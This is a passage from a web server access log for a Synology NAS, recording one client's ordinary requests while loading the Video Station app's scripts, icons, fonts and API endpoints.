[Length 1052992] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xmFA" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xmG7&sid=Eg4WDlNnvPf9JcJbAAAD" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - POST https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xmHE&sid=Eg4WDlNnvPf9JcJbAAAD" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 22694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/md5.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1495] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/jwplayer.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 17186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/lz-string.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1477] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xmHE.0&sid=Eg4WDlNnvPf9JcJbAAAD" [Client 84.1.26.27] [Length 3] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/jwplayer.html5.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 57402] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/hls.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 50442] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/cast_sender.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1976] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:45 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/controller/ui/videocontroller2.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 46583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768485225424&SynoToken=MbvSA7Zte.JE6&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/videostation2.js?v=3.0.7-2512&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 175926] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/vs_logo.png?v=ca44e76cfff9d0dfc530b44aa2a05235" [Client 84.1.26.27] [Length 3739] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_header_home.png?v=547af0351ba49e60310515932b046154" [Client 84.1.26.27] [Length 803] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_round_cancel_s.png?v=da398138b44fcbb1edc927745f9d217c" [Client 84.1.26.27] [Length 798] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_indicator_search_s.png?v=318a9fb5f1f57c8b9efe775dc5cb8870" [Client 84.1.26.27] [Length 512] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/dropdown_arrow.png?v=5892af29e80bf6250ca3970066b1f158" [Client 84.1.26.27] [Length 241] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_header_help.png?v=6c2e16ea7fa1de31cf7baa13f80fcf9f" [Client 84.1.26.27] [Length 1249] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_default_no_data_l.png?v=b3dbfb04d8560dbf69d799066048b2f7" [Client 84.1.26.27] [Length 3332] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/path_arrow.png?v=c6a6a7d3be91cdf5c83bd49f0b06b432" [Client 84.1.26.27] [Length 377] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_header_edit.png?v=b029f5b7d11d31ba829a8ba2a0da8e31" [Client 84.1.26.27] [Length 1333] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/panel_shadow_right.png?v=e34446ffd374c2cbc6f6bb7c9c1af1eb" [Client 84.1.26.27] [Length 181] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/font/Roboto-Regular.ttf" [Client 84.1.26.27] [Length 145348] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:46 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=32&retina=false&path=webman/3rdparty/VideoStation/images/app/VideoStation_{0}.png&app_version=3.0.7-2512" [Client 84.1.26.27] [Length 2171] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3561] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 323] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:47 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_header_queue.png?v=03f7429e068a238cd57c6a4e25614532" [Client 84.1.26.27] [Length 1571] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 216] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_library_more.png?v=57c22cdfeb3c87204d37f32d22828103" [Client 84.1.26.27] [Length 205] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_category_video.png?v=97f0a786333239d372aa6e6c5341ae89" [Client 84.1.26.27] [Length 281] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_library_add.png?v=f68f3bf8be3c73afa093b5d24f04cc1c" [Client 84.1.26.27] [Length 921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3822] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_category_movie.png?v=712112549a6f86d1d48fd6fc988252f3" [Client 84.1.26.27] [Length 326] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/scrollbar_white_v.png?v=61c8304c4db223656ac9b009ff52781b" [Client 84.1.26.27] [Length 122] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_category_playlist.png?v=db8092a6dc4d40499bea4310e30d6c74" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/font/Roboto-Bold.ttf" [Client 84.1.26.27] [Length 135820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14168&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:48 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14225&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:48 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28647&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_list_add.png?v=ff25421198bcca8a1bc86f6000fae965" [Client 84.1.26.27] [Length 515] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_erase_s.png?v=f93bf2376c15d4ccb23e650349afa250" [Client 84.1.26.27] [Length 922] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_rating.png?v=7059e09215bae3805fd092242ed5e383" [Client 84.1.26.27] [Length 1308] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14555&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28493&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_indicator_movie.png?v=ba11f1abfe2f531474d7a0280cef3310" [Client 84.1.26.27] [Length 375] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_back.png?v=25df3c55cc8789583ea5ac777eaabbd3" [Client 84.1.26.27] [Length 873] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29383&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_btn_next.png?v=80b8053be9c426aa83b158e63394ad0a" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/VideoStation/style.css?v=1711016943" +[15/Jan/2026:13:53:49 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/VideoStation/images/1x/icon_indicator_video.png?v=679f02239665c6f360b5e478dc7615d4" [Client 84.1.26.27] [Length 344] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 